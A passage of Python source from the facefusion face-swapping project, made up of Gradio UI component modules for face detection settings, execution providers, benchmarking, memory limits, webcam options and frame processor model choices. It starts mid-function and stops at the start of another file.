preview_vision_frame = process_preview_frame(reference_faces, source_face, source_audio_frame, temp_vision_frame) preview_vision_frame = normalize_frame_color(preview_vision_frame) return gradio.Image(value = preview_vision_frame) return gradio.Image(value = None) def update_preview_frame_slider() -> gradio.Slider: if is_video(facefusion.globals.target_path): video_frame_total = count_video_frame_total(facefusion.globals.target_path) return gradio.Slider(maximum = video_frame_total, visible = True) return gradio.Slider(value = None, maximum = None, visible = False) def process_preview_frame(reference_faces : FaceSet, source_face : Face, source_audio_frame : AudioFrame, target_vision_frame : VisionFrame) -> VisionFrame: target_vision_frame = resize_frame_resolution(target_vision_frame, (640, 640)) if analyse_frame(target_vision_frame): return cv2.GaussianBlur(target_vision_frame, (99, 99), 0) for frame_processor in facefusion.globals.frame_processors: frame_processor_module = load_frame_processor_module(frame_processor) logger.disable() if frame_processor_module.pre_process('preview'): logger.enable() target_vision_frame = frame_processor_module.process_frame( { 'reference_faces': reference_faces, 'source_face': source_face, 'source_audio_frame': source_audio_frame, 'target_vision_frame': target_vision_frame }) return target_vision_frame File: facefusion/uis/components/face_analyser.py from typing import Optional, Dict, Any, Tuple import gradio import facefusion.globals import facefusion.choices from facefusion import face_analyser, wording from facefusion.typing import FaceAnalyserOrder, 
FaceAnalyserAge, FaceAnalyserGender, FaceDetectorModel from facefusion.uis.core import register_ui_component FACE_ANALYSER_ORDER_DROPDOWN : Optional[gradio.Dropdown] = None FACE_ANALYSER_AGE_DROPDOWN : Optional[gradio.Dropdown] = None FACE_ANALYSER_GENDER_DROPDOWN : Optional[gradio.Dropdown] = None FACE_DETECTOR_MODEL_DROPDOWN : Optional[gradio.Dropdown] = None FACE_DETECTOR_SIZE_DROPDOWN : Optional[gradio.Dropdown] = None FACE_DETECTOR_SCORE_SLIDER : Optional[gradio.Slider] = None FACE_LANDMARKER_SCORE_SLIDER : Optional[gradio.Slider] = None def render() -> None: global FACE_ANALYSER_ORDER_DROPDOWN global FACE_ANALYSER_AGE_DROPDOWN global FACE_ANALYSER_GENDER_DROPDOWN global FACE_DETECTOR_MODEL_DROPDOWN global FACE_DETECTOR_SIZE_DROPDOWN global FACE_DETECTOR_SCORE_SLIDER global FACE_LANDMARKER_SCORE_SLIDER face_detector_size_dropdown_args : Dict[str, Any] =\ { 'label': wording.get('uis.face_detector_size_dropdown'), 'value': facefusion.globals.face_detector_size } if facefusion.globals.face_detector_size in facefusion.choices.face_detector_set[facefusion.globals.face_detector_model]: face_detector_size_dropdown_args['choices'] = facefusion.choices.face_detector_set[facefusion.globals.face_detector_model] with gradio.Row(): FACE_ANALYSER_ORDER_DROPDOWN = gradio.Dropdown( label = wording.get('uis.face_analyser_order_dropdown'), choices = facefusion.choices.face_analyser_orders, value = facefusion.globals.face_analyser_order ) FACE_ANALYSER_AGE_DROPDOWN = gradio.Dropdown( label = wording.get('uis.face_analyser_age_dropdown'), choices = [ 'none' ] + facefusion.choices.face_analyser_ages, value = facefusion.globals.face_analyser_age or 'none' ) FACE_ANALYSER_GENDER_DROPDOWN = gradio.Dropdown( label = wording.get('uis.face_analyser_gender_dropdown'), choices = [ 'none' ] + facefusion.choices.face_analyser_genders, value = facefusion.globals.face_analyser_gender or 'none' ) FACE_DETECTOR_MODEL_DROPDOWN = gradio.Dropdown( label = wording.get('uis.face_detector_model_dropdown'), choices = facefusion.choices.face_detector_set.keys(), value = facefusion.globals.face_detector_model ) FACE_DETECTOR_SIZE_DROPDOWN = gradio.Dropdown(**face_detector_size_dropdown_args) with gradio.Row(): FACE_DETECTOR_SCORE_SLIDER = gradio.Slider( label = wording.get('uis.face_detector_score_slider'), value = facefusion.globals.face_detector_score, step = facefusion.choices.face_detector_score_range[1] - facefusion.choices.face_detector_score_range[0], minimum = facefusion.choices.face_detector_score_range[0], maximum = facefusion.choices.face_detector_score_range[-1] ) FACE_LANDMARKER_SCORE_SLIDER = gradio.Slider( label = wording.get('uis.face_landmarker_score_slider'), value = facefusion.globals.face_landmarker_score, step = facefusion.choices.face_landmarker_score_range[1] - facefusion.choices.face_landmarker_score_range[0], minimum = facefusion.choices.face_landmarker_score_range[0], maximum = facefusion.choices.face_landmarker_score_range[-1] ) register_ui_component('face_analyser_order_dropdown', FACE_ANALYSER_ORDER_DROPDOWN) register_ui_component('face_analyser_age_dropdown', FACE_ANALYSER_AGE_DROPDOWN) register_ui_component('face_analyser_gender_dropdown', FACE_ANALYSER_GENDER_DROPDOWN) register_ui_component('face_detector_model_dropdown', FACE_DETECTOR_MODEL_DROPDOWN) register_ui_component('face_detector_size_dropdown', FACE_DETECTOR_SIZE_DROPDOWN) register_ui_component('face_detector_score_slider', FACE_DETECTOR_SCORE_SLIDER) register_ui_component('face_landmarker_score_slider', FACE_LANDMARKER_SCORE_SLIDER) def 
listen() -> None: FACE_ANALYSER_ORDER_DROPDOWN.change(update_face_analyser_order, inputs = FACE_ANALYSER_ORDER_DROPDOWN) FACE_ANALYSER_AGE_DROPDOWN.change(update_face_analyser_age, inputs = FACE_ANALYSER_AGE_DROPDOWN) FACE_ANALYSER_GENDER_DROPDOWN.change(update_face_analyser_gender, inputs = FACE_ANALYSER_GENDER_DROPDOWN) FACE_DETECTOR_MODEL_DROPDOWN.change(update_face_detector_model, inputs = FACE_DETECTOR_MODEL_DROPDOWN, outputs = [ FACE_DETECTOR_MODEL_DROPDOWN, FACE_DETECTOR_SIZE_DROPDOWN ]) FACE_DETECTOR_SIZE_DROPDOWN.change(update_face_detector_size, inputs = FACE_DETECTOR_SIZE_DROPDOWN) FACE_DETECTOR_SCORE_SLIDER.release(update_face_detector_score, inputs = FACE_DETECTOR_SCORE_SLIDER) FACE_LANDMARKER_SCORE_SLIDER.release(update_face_landmarker_score, inputs = FACE_LANDMARKER_SCORE_SLIDER) def update_face_analyser_order(face_analyser_order : FaceAnalyserOrder) -> None: facefusion.globals.face_analyser_order = face_analyser_order if face_analyser_order != 'none' else None def update_face_analyser_age(face_analyser_age : FaceAnalyserAge) -> None: facefusion.globals.face_analyser_age = face_analyser_age if face_analyser_age != 'none' else None def update_face_analyser_gender(face_analyser_gender : FaceAnalyserGender) -> None: facefusion.globals.face_analyser_gender = face_analyser_gender if face_analyser_gender != 'none' else None def update_face_detector_model(face_detector_model : FaceDetectorModel) -> Tuple[gradio.Dropdown, gradio.Dropdown]: facefusion.globals.face_detector_model = face_detector_model update_face_detector_size('640x640') if face_analyser.pre_check(): if facefusion.globals.face_detector_size in facefusion.choices.face_detector_set[face_detector_model]: return gradio.Dropdown(value = facefusion.globals.face_detector_model), gradio.Dropdown(value = facefusion.globals.face_detector_size, choices = facefusion.choices.face_detector_set[face_detector_model]) return gradio.Dropdown(value = facefusion.globals.face_detector_model), gradio.Dropdown(value = facefusion.globals.face_detector_size, choices = [ facefusion.globals.face_detector_size ]) return gradio.Dropdown(), gradio.Dropdown() def update_face_detector_size(face_detector_size : str) -> None: facefusion.globals.face_detector_size = face_detector_size def update_face_detector_score(face_detector_score : float) -> None: facefusion.globals.face_detector_score = face_detector_score def update_face_landmarker_score(face_landmarker_score : float) -> None: facefusion.globals.face_landmarker_score = face_landmarker_score File: facefusion/uis/components/execution.py from typing import List, Optional import gradio import onnxruntime import facefusion.globals from facefusion import wording from facefusion.face_analyser import clear_face_analyser from facefusion.processors.frame.core import clear_frame_processors_modules from facefusion.execution import encode_execution_providers, decode_execution_providers EXECUTION_PROVIDERS_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None def render() -> None: global EXECUTION_PROVIDERS_CHECKBOX_GROUP EXECUTION_PROVIDERS_CHECKBOX_GROUP = gradio.CheckboxGroup( label = wording.get('uis.execution_providers_checkbox_group'), choices = encode_execution_providers(onnxruntime.get_available_providers()), value = encode_execution_providers(facefusion.globals.execution_providers) ) def listen() -> None: EXECUTION_PROVIDERS_CHECKBOX_GROUP.change(update_execution_providers, inputs = EXECUTION_PROVIDERS_CHECKBOX_GROUP, outputs = EXECUTION_PROVIDERS_CHECKBOX_GROUP) def 
update_execution_providers(execution_providers : List[str]) -> gradio.CheckboxGroup: clear_face_analyser() clear_frame_processors_modules() execution_providers = execution_providers or encode_execution_providers(onnxruntime.get_available_providers()) facefusion.globals.execution_providers = decode_execution_providers(execution_providers) return gradio.CheckboxGroup(value = execution_providers) File: facefusion/uis/components/benchmark.py from typing import Any, Optional, List, Dict, Generator from time import sleep, perf_counter import tempfile import statistics import gradio import facefusion.globals from facefusion import process_manager, wording from facefusion.face_store import clear_static_faces from facefusion.processors.frame.core import get_frame_processors_modules from facefusion.vision import count_video_frame_total, detect_video_resolution, detect_video_fps, pack_resolution from facefusion.core import conditional_process from facefusion.memory import limit_system_memory from facefusion.filesystem import clear_temp from facefusion.uis.core import get_ui_component BENCHMARK_RESULTS_DATAFRAME : Optional[gradio.Dataframe] = None BENCHMARK_START_BUTTON : Optional[gradio.Button] = None BENCHMARK_CLEAR_BUTTON : Optional[gradio.Button] = None BENCHMARKS : Dict[str, str] =\ { '240p': '.assets/examples/target-240p.mp4', '360p': '.assets/examples/target-360p.mp4', '540p': '.assets/examples/target-540p.mp4', '720p': '.assets/examples/target-720p.mp4', '1080p': '.assets/examples/target-1080p.mp4', '1440p': '.assets/examples/target-1440p.mp4', '2160p': '.assets/examples/target-2160p.mp4' } def render() -> None: global BENCHMARK_RESULTS_DATAFRAME global BENCHMARK_START_BUTTON global BENCHMARK_CLEAR_BUTTON BENCHMARK_RESULTS_DATAFRAME = gradio.Dataframe( label = wording.get('uis.benchmark_results_dataframe'), headers = [ 'target_path', 'benchmark_cycles', 'average_run', 'fastest_run', 'slowest_run', 'relative_fps' ], datatype = [ 'str', 'number', 'number', 'number', 'number', 'number' ] ) BENCHMARK_START_BUTTON = gradio.Button( value = wording.get('uis.start_button'), variant = 'primary', size = 'sm' ) BENCHMARK_CLEAR_BUTTON = gradio.Button( value = wording.get('uis.clear_button'), size = 'sm' ) def listen() -> None: benchmark_runs_checkbox_group = get_ui_component('benchmark_runs_checkbox_group') benchmark_cycles_slider = get_ui_component('benchmark_cycles_slider') if benchmark_runs_checkbox_group and benchmark_cycles_slider: BENCHMARK_START_BUTTON.click(start, inputs = [ benchmark_runs_checkbox_group, benchmark_cycles_slider ], outputs = BENCHMARK_RESULTS_DATAFRAME) BENCHMARK_CLEAR_BUTTON.click(clear, outputs = BENCHMARK_RESULTS_DATAFRAME) def start(benchmark_runs : List[str], benchmark_cycles : int) -> Generator[List[Any], None, None]: facefusion.globals.source_paths = [ '.assets/examples/source.jpg', '.assets/examples/source.mp3' ] facefusion.globals.output_path = tempfile.gettempdir() facefusion.globals.face_landmarker_score = 0 facefusion.globals.temp_frame_format = 'bmp' facefusion.globals.output_video_preset = 'ultrafast' benchmark_results = [] target_paths = [ BENCHMARKS[benchmark_run] for benchmark_run in benchmark_runs if benchmark_run in BENCHMARKS ] if target_paths: pre_process() for target_path in target_paths: facefusion.globals.target_path = target_path benchmark_results.append(benchmark(benchmark_cycles)) yield benchmark_results post_process() def pre_process() -> None: if facefusion.globals.system_memory_limit > 0: limit_system_memory(facefusion.globals.system_memory_limit) for 
frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors): frame_processor_module.get_frame_processor() def post_process() -> None: clear_static_faces() def benchmark(benchmark_cycles : int) -> List[Any]: process_times = [] video_frame_total = count_video_frame_total(facefusion.globals.target_path) output_video_resolution = detect_video_resolution(facefusion.globals.target_path) facefusion.globals.output_video_resolution = pack_resolution(output_video_resolution) facefusion.globals.output_video_fps = detect_video_fps(facefusion.globals.target_path) for index in range(benchmark_cycles): start_time = perf_counter() conditional_process() end_time = perf_counter() process_times.append(end_time - start_time) average_run = round(statistics.mean(process_times), 2) fastest_run = round(min(process_times), 2) slowest_run = round(max(process_times), 2) relative_fps = round(video_frame_total * benchmark_cycles / sum(process_times), 2) return\ [ facefusion.globals.target_path, benchmark_cycles, average_run, fastest_run, slowest_run, relative_fps ] def clear() -> gradio.Dataframe: while process_manager.is_processing(): sleep(0.5) if facefusion.globals.target_path: clear_temp(facefusion.globals.target_path) return gradio.Dataframe(value = None) File: facefusion/uis/components/memory.py from typing import Optional import gradio import facefusion.globals import facefusion.choices from facefusion.typing import VideoMemoryStrategy from facefusion import wording VIDEO_MEMORY_STRATEGY_DROPDOWN : Optional[gradio.Dropdown] = None SYSTEM_MEMORY_LIMIT_SLIDER : Optional[gradio.Slider] = None def render() -> None: global VIDEO_MEMORY_STRATEGY_DROPDOWN global SYSTEM_MEMORY_LIMIT_SLIDER VIDEO_MEMORY_STRATEGY_DROPDOWN = gradio.Dropdown( label = wording.get('uis.video_memory_strategy_dropdown'), choices = facefusion.choices.video_memory_strategies, value = facefusion.globals.video_memory_strategy ) SYSTEM_MEMORY_LIMIT_SLIDER = gradio.Slider( label = wording.get('uis.system_memory_limit_slider'), step =facefusion.choices.system_memory_limit_range[1] - facefusion.choices.system_memory_limit_range[0], minimum = facefusion.choices.system_memory_limit_range[0], maximum = facefusion.choices.system_memory_limit_range[-1], value = facefusion.globals.system_memory_limit ) def listen() -> None: VIDEO_MEMORY_STRATEGY_DROPDOWN.change(update_video_memory_strategy, inputs = VIDEO_MEMORY_STRATEGY_DROPDOWN) SYSTEM_MEMORY_LIMIT_SLIDER.release(update_system_memory_limit, inputs = SYSTEM_MEMORY_LIMIT_SLIDER) def update_video_memory_strategy(video_memory_strategy : VideoMemoryStrategy) -> None: facefusion.globals.video_memory_strategy = video_memory_strategy def update_system_memory_limit(system_memory_limit : int) -> None: facefusion.globals.system_memory_limit = system_memory_limit File: facefusion/uis/components/webcam_options.py from typing import Optional import gradio from facefusion import wording from facefusion.uis import choices as uis_choices from facefusion.uis.core import register_ui_component WEBCAM_MODE_RADIO : Optional[gradio.Radio] = None WEBCAM_RESOLUTION_DROPDOWN : Optional[gradio.Dropdown] = None WEBCAM_FPS_SLIDER : Optional[gradio.Slider] = None def render() -> None: global WEBCAM_MODE_RADIO global WEBCAM_RESOLUTION_DROPDOWN global WEBCAM_FPS_SLIDER WEBCAM_MODE_RADIO = gradio.Radio( label = wording.get('uis.webcam_mode_radio'), choices = uis_choices.webcam_modes, value = 'inline' ) WEBCAM_RESOLUTION_DROPDOWN = gradio.Dropdown( label = wording.get('uis.webcam_resolution_dropdown'), 
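# Illustrative sketch, not part of the facefusion sources: how benchmark()
# above condenses the measured cycle times into one dataframe row, using
# made-up process times and frame total.
import statistics

process_times_example = [ 12.5, 11.8, 13.1 ]
video_frame_total_example = 300
benchmark_cycles_example = len(process_times_example)
average_run_example = round(statistics.mean(process_times_example), 2)  # 12.47
fastest_run_example = round(min(process_times_example), 2)              # 11.8
slowest_run_example = round(max(process_times_example), 2)              # 13.1
relative_fps_example = round(video_frame_total_example * benchmark_cycles_example / sum(process_times_example), 2)  # 24.06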
choices = uis_choices.webcam_resolutions, value = uis_choices.webcam_resolutions[0] ) WEBCAM_FPS_SLIDER = gradio.Slider( label = wording.get('uis.webcam_fps_slider'), value = 25, step = 1, minimum = 1, maximum = 60 ) register_ui_component('webcam_mode_radio', WEBCAM_MODE_RADIO) register_ui_component('webcam_resolution_dropdown', WEBCAM_RESOLUTION_DROPDOWN) register_ui_component('webcam_fps_slider', WEBCAM_FPS_SLIDER) File: facefusion/uis/components/frame_processors_options.py from typing import List, Optional, Tuple import gradio import facefusion.globals from facefusion import face_analyser, wording from facefusion.processors.frame.core import load_frame_processor_module from facefusion.processors.frame import globals as frame_processors_globals, choices as frame_processors_choices from facefusion.processors.frame.typings import FaceDebuggerItem, FaceEnhancerModel, FaceSwapperModel, FrameColorizerModel, FrameEnhancerModel, LipSyncerModel from facefusion.uis.core import get_ui_component, register_ui_component FACE_DEBUGGER_ITEMS_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None FACE_ENHANCER_MODEL_DROPDOWN : Optional[gradio.Dropdown] = None FACE_ENHANCER_BLEND_SLIDER : Optional[gradio.Slider] = None FACE_SWAPPER_MODEL_DROPDOWN : Optional[gradio.Dropdown] = None FRAME_COLORIZER_MODEL_DROPDOWN : Optional[gradio.Dropdown] = None FRAME_COLORIZER_BLEND_SLIDER : Optional[gradio.Slider] = None FRAME_COLORIZER_SIZE_DROPDOWN : Optional[gradio.Dropdown] = None FRAME_ENHANCER_MODEL_DROPDOWN : Optional[gradio.Dropdown] = None FRAME_ENHANCER_BLEND_SLIDER : Optional[gradio.Slider] = None LIP_SYNCER_MODEL_DROPDOWN : Optional[gradio.Dropdown] = None def render() -> None: global FACE_DEBUGGER_ITEMS_CHECKBOX_GROUP global FACE_ENHANCER_MODEL_DROPDOWN global FACE_ENHANCER_BLEND_SLIDER global FACE_SWAPPER_MODEL_DROPDOWN global FRAME_COLORIZER_MODEL_DROPDOWN global FRAME_COLORIZER_BLEND_SLIDER global FRAME_COLORIZER_SIZE_DROPDOWN global FRAME_ENHANCER_MODEL_DROPDOWN global FRAME_ENHANCER_BLEND_SLIDER global LIP_SYNCER_MODEL_DROPDOWN FACE_DEBUGGER_ITEMS_CHECKBOX_GROUP = gradio.CheckboxGroup( label = wording.get('uis.face_debugger_items_checkbox_group'), choices = frame_processors_choices.face_debugger_items, value = frame_processors_globals.face_debugger_items, visible = 'face_debugger' in facefusion.globals.frame_processors ) FACE_ENHANCER_MODEL_DROPDOWN = gradio.Dropdown( label = wording.get('uis.face_enhancer_model_dropdown'), choices = frame_processors_choices.face_enhancer_models, value = frame_processors_globals.face_enhancer_model, visible = 'face_enhancer' in facefusion.globals.frame_processors ) FACE_ENHANCER_BLEND_SLIDER = gradio.Slider( label = wording.get('uis.face_enhancer_blend_slider'), value = frame_processors_globals.face_enhancer_blend, step = frame_processors_choices.face_enhancer_blend_range[1] - frame_processors_choices.face_enhancer_blend_range[0], minimum = frame_processors_choices.face_enhancer_blend_range[0], maximum = frame_processors_choices.face_enhancer_blend_range[-1], visible = 'face_enhancer' in facefusion.globals.frame_processors ) FACE_SWAPPER_MODEL_DROPDOWN = gradio.Dropdown( label = wording.get('uis.face_swapper_model_dropdown'), choices = frame_processors_choices.face_swapper_models, value = frame_processors_globals.face_swapper_model, visible = 'face_swapper' in facefusion.globals.frame_processors ) FRAME_COLORIZER_MODEL_DROPDOWN = gradio.Dropdown( label = wording.get('uis.frame_colorizer_model_dropdown'), choices = frame_processors_choices.frame_colorizer_models, value 
= frame_processors_globals.frame_colorizer_model, visible = 'frame_colorizer' in facefusion.globals.frame_processors ) FRAME_COLORIZER_BLEND_SLIDER = gradio.Slider( label = wording.get('uis.frame_colorizer_blend_slider'), value = frame_processors_globals.frame_colorizer_blend, step = frame_processors_choices.frame_colorizer_blend_range[1] - frame_processors_choices.frame_colorizer_blend_range[0], minimum = frame_processors_choices.frame_colorizer_blend_range[0], maximum = frame_processors_choices.frame_colorizer_blend_range[-1], visible = 'frame_colorizer' in facefusion.globals.frame_processors ) FRAME_COLORIZER_SIZE_DROPDOWN = gradio.Dropdown( label = wording.get('uis.frame_colorizer_size_dropdown'), choices = frame_processors_choices.frame_colorizer_sizes, value = frame_processors_globals.frame_colorizer_size, visible = 'frame_colorizer' in facefusion.globals.frame_processors ) FRAME_ENHANCER_MODEL_DROPDOWN = gradio.Dropdown( label = wording.get('uis.frame_enhancer_model_dropdown'), choices = frame_processors_choices.frame_enhancer_models, value = frame_processors_globals.frame_enhancer_model, visible = 'frame_enhancer' in facefusion.globals.frame_processors ) FRAME_ENHANCER_BLEND_SLIDER = gradio.Slider( label = wording.get('uis.frame_enhancer_blend_slider'), value = frame_processors_globals.frame_enhancer_blend, step = frame_processors_choices.frame_enhancer_blend_range[1] - frame_processors_choices.frame_enhancer_blend_range[0], minimum = frame_processors_choices.frame_enhancer_blend_range[0], maximum = frame_processors_choices.frame_enhancer_blend_range[-1], visible = 'frame_enhancer' in facefusion.globals.frame_processors ) LIP_SYNCER_MODEL_DROPDOWN = gradio.Dropdown( label = wording.get('uis.lip_syncer_model_dropdown'), choices = frame_processors_choices.lip_syncer_models, value = frame_processors_globals.lip_syncer_model, visible = 'lip_syncer' in facefusion.globals.frame_processors ) register_ui_component('face_debugger_items_checkbox_group', FACE_DEBUGGER_ITEMS_CHECKBOX_GROUP) register_ui_component('face_enhancer_model_dropdown', FACE_ENHANCER_MODEL_DROPDOWN) register_ui_component('face_enhancer_blend_slider', FACE_ENHANCER_BLEND_SLIDER) register_ui_component('face_swapper_model_dropdown', FACE_SWAPPER_MODEL_DROPDOWN) register_ui_component('frame_colorizer_model_dropdown', FRAME_COLORIZER_MODEL_DROPDOWN) register_ui_component('frame_colorizer_blend_slider', FRAME_COLORIZER_BLEND_SLIDER) register_ui_component('frame_colorizer_size_dropdown', FRAME_COLORIZER_SIZE_DROPDOWN) register_ui_component('frame_enhancer_model_dropdown', FRAME_ENHANCER_MODEL_DROPDOWN) register_ui_component('frame_enhancer_blend_slider', FRAME_ENHANCER_BLEND_SLIDER) register_ui_component('lip_syncer_model_dropdown', LIP_SYNCER_MODEL_DROPDOWN) def listen() -> None: FACE_DEBUGGER_ITEMS_CHECKBOX_GROUP.change(update_face_debugger_items, inputs = FACE_DEBUGGER_ITEMS_CHECKBOX_GROUP) FACE_ENHANCER_MODEL_DROPDOWN.change(update_face_enhancer_model, inputs = FACE_ENHANCER_MODEL_DROPDOWN, outputs = FACE_ENHANCER_MODEL_DROPDOWN) FACE_ENHANCER_BLEND_SLIDER.release(update_face_enhancer_blend, inputs = FACE_ENHANCER_BLEND_SLIDER) FACE_SWAPPER_MODEL_DROPDOWN.change(update_face_swapper_model, inputs = FACE_SWAPPER_MODEL_DROPDOWN, outputs = FACE_SWAPPER_MODEL_DROPDOWN) FRAME_COLORIZER_MODEL_DROPDOWN.change(update_frame_colorizer_model, inputs = FRAME_COLORIZER_MODEL_DROPDOWN, outputs = FRAME_COLORIZER_MODEL_DROPDOWN) FRAME_COLORIZER_BLEND_SLIDER.release(update_frame_colorizer_blend, inputs = FRAME_COLORIZER_BLEND_SLIDER) 
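# Illustrative sketch, not part of the facefusion sources: the listener pattern
# wired up above, reduced to one hypothetical dropdown. The change handler
# stores the selection in module-level state and returns a fresh component
# instance so Gradio refreshes the dropdown in place.
import gradio

EXAMPLE_MODEL = 'inswapper_128'

def example_update_model(model_name : str) -> gradio.Dropdown:
    global EXAMPLE_MODEL
    EXAMPLE_MODEL = model_name
    return gradio.Dropdown(value = EXAMPLE_MODEL)

with gradio.Blocks() as example_blocks:
    example_dropdown = gradio.Dropdown(choices = [ 'inswapper_128', 'simswap_256' ], value = EXAMPLE_MODEL)
    example_dropdown.change(example_update_model, inputs = example_dropdown, outputs = example_dropdown)
# example_blocks.launch()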
FRAME_COLORIZER_SIZE_DROPDOWN.change(update_frame_colorizer_size, inputs = FRAME_COLORIZER_SIZE_DROPDOWN, outputs = FRAME_COLORIZER_SIZE_DROPDOWN) FRAME_ENHANCER_MODEL_DROPDOWN.change(update_frame_enhancer_model, inputs = FRAME_ENHANCER_MODEL_DROPDOWN, outputs = FRAME_ENHANCER_MODEL_DROPDOWN) FRAME_ENHANCER_BLEND_SLIDER.release(update_frame_enhancer_blend, inputs = FRAME_ENHANCER_BLEND_SLIDER) LIP_SYNCER_MODEL_DROPDOWN.change(update_lip_syncer_model, inputs = LIP_SYNCER_MODEL_DROPDOWN, outputs = LIP_SYNCER_MODEL_DROPDOWN) frame_processors_checkbox_group = get_ui_component('frame_processors_checkbox_group') if frame_processors_checkbox_group: frame_processors_checkbox_group.change(update_frame_processors, inputs = frame_processors_checkbox_group, outputs = [ FACE_DEBUGGER_ITEMS_CHECKBOX_GROUP, FACE_ENHANCER_MODEL_DROPDOWN, FACE_ENHANCER_BLEND_SLIDER, FACE_SWAPPER_MODEL_DROPDOWN, FRAME_COLORIZER_MODEL_DROPDOWN, FRAME_COLORIZER_BLEND_SLIDER, FRAME_COLORIZER_SIZE_DROPDOWN, FRAME_ENHANCER_MODEL_DROPDOWN, FRAME_ENHANCER_BLEND_SLIDER, LIP_SYNCER_MODEL_DROPDOWN ]) def update_frame_processors(frame_processors : List[str]) -> Tuple[gradio.CheckboxGroup, gradio.Dropdown, gradio.Slider, gradio.Dropdown, gradio.Dropdown, gradio.Slider, gradio.Dropdown, gradio.Dropdown, gradio.Slider, gradio.Dropdown]: has_face_debugger = 'face_debugger' in frame_processors has_face_enhancer = 'face_enhancer' in frame_processors has_face_swapper = 'face_swapper' in frame_processors has_frame_colorizer = 'frame_colorizer' in frame_processors has_frame_enhancer = 'frame_enhancer' in frame_processors has_lip_syncer = 'lip_syncer' in frame_processors return gradio.CheckboxGroup(visible = has_face_debugger), gradio.Dropdown(visible = has_face_enhancer), gradio.Slider(visible = has_face_enhancer), gradio.Dropdown(visible = has_face_swapper), gradio.Dropdown(visible = has_frame_colorizer), gradio.Slider(visible = has_frame_colorizer), gradio.Dropdown(visible = has_frame_colorizer), gradio.Dropdown(visible = has_frame_enhancer), gradio.Slider(visible = has_frame_enhancer), gradio.Dropdown(visible = has_lip_syncer) def update_face_debugger_items(face_debugger_items : List[FaceDebuggerItem]) -> None: frame_processors_globals.face_debugger_items = face_debugger_items def update_face_enhancer_model(face_enhancer_model : FaceEnhancerModel) -> gradio.Dropdown: frame_processors_globals.face_enhancer_model = face_enhancer_model face_enhancer_module = load_frame_processor_module('face_enhancer') face_enhancer_module.clear_frame_processor() face_enhancer_module.set_options('model', face_enhancer_module.MODELS[face_enhancer_model]) if face_enhancer_module.pre_check(): return gradio.Dropdown(value = frame_processors_globals.face_enhancer_model) return gradio.Dropdown() def update_face_enhancer_blend(face_enhancer_blend : int) -> None: frame_processors_globals.face_enhancer_blend = face_enhancer_blend def update_face_swapper_model(face_swapper_model : FaceSwapperModel) -> gradio.Dropdown: frame_processors_globals.face_swapper_model = face_swapper_model if face_swapper_model == 'blendswap_256': facefusion.globals.face_recognizer_model = 'arcface_blendswap' if face_swapper_model == 'inswapper_128' or face_swapper_model == 'inswapper_128_fp16': facefusion.globals.face_recognizer_model = 'arcface_inswapper' if face_swapper_model == 'simswap_256' or face_swapper_model == 'simswap_512_unofficial': facefusion.globals.face_recognizer_model = 'arcface_simswap' if face_swapper_model == 'uniface_256': facefusion.globals.face_recognizer_model = 
'arcface_uniface' face_swapper_module = load_frame_processor_module('face_swapper') face_swapper_module.clear_model_initializer() face_swapper_module.clear_frame_processor() face_swapper_module.set_options('model', face_swapper_module.MODELS[face_swapper_model]) if face_analyser.pre_check() and face_swapper_module.pre_check(): return gradio.Dropdown(value = frame_processors_globals.face_swapper_model) return gradio.Dropdown() def update_frame_colorizer_model(frame_colorizer_model : FrameColorizerModel) -> gradio.Dropdown: frame_processors_globals.frame_colorizer_model = frame_colorizer_model frame_colorizer_module = load_frame_processor_module('frame_colorizer') frame_colorizer_module.clear_frame_processor() frame_colorizer_module.set_options('model', frame_colorizer_module.MODELS[frame_colorizer_model]) if frame_colorizer_module.pre_check(): return gradio.Dropdown(value = frame_processors_globals.frame_colorizer_model) return gradio.Dropdown() def update_frame_colorizer_blend(frame_colorizer_blend : int) -> None: frame_processors_globals.frame_colorizer_blend = frame_colorizer_blend def update_frame_colorizer_size(frame_colorizer_size : str) -> gradio.Dropdown: frame_processors_globals.frame_colorizer_size = frame_colorizer_size return gradio.Dropdown(value = frame_processors_globals.frame_colorizer_size) def update_frame_enhancer_model(frame_enhancer_model : FrameEnhancerModel) -> gradio.Dropdown: frame_processors_globals.frame_enhancer_model = frame_enhancer_model frame_enhancer_module = load_frame_processor_module('frame_enhancer') frame_enhancer_module.clear_frame_processor() frame_enhancer_module.set_options('model', frame_enhancer_module.MODELS[frame_enhancer_model]) if frame_enhancer_module.pre_check(): return gradio.Dropdown(value = frame_processors_globals.frame_enhancer_model) return gradio.Dropdown() def update_frame_enhancer_blend(frame_enhancer_blend : int) -> None: frame_processors_globals.frame_enhancer_blend = frame_enhancer_blend def update_lip_syncer_model(lip_syncer_model : LipSyncerModel) -> gradio.Dropdown: frame_processors_globals.lip_syncer_model = lip_syncer_model lip_syncer_module = load_frame_processor_module('lip_syncer') lip_syncer_module.clear_frame_processor() lip_syncer_module.set_options('model', lip_syncer_module.MODELS[lip_syncer_model]) if lip_syncer_module.pre_check(): return gradio.Dropdown(value = frame_processors_globals.lip_syncer_model) return gradio.Dropdown() File: facefusion/uis/components/common_options.py from typing import Optional, List import gradio import facefusion.globals from facefusion import wording from facefusion.uis import choices as uis_choices COMMON_OPTIONS_CHECKBOX_GROUP : Optional[gradio.Checkboxgroup] = None def render() -> None: global COMMON_OPTIONS_CHECKBOX_GROUP value = [] if facefusion.globals.keep_temp: value.append('keep-temp') if facefusion.globals.skip_audio: value.append('skip-audio') if facefusion.globals.skip_download: value.append('skip-download') COMMON_OPTIONS_CHECKBOX_GROUP = gradio.Checkboxgroup( label = wording.get('uis.common_options_checkbox_group'), choices = uis_choices.common_options, value = value ) def listen() -> None: COMMON_OPTIONS_CHECKBOX_GROUP.change(update, inputs = COMMON_OPTIONS_CHECKBOX_GROUP) def update(common_options : List[str]) -> None: facefusion.globals.keep_temp = 'keep-temp' in common_options facefusion.globals.skip_audio = 'skip-audio' in common_options facefusion.globals.skip_download = 'skip-download' in common_options File: facefusion/uis/components/trim_frame.py from typing 
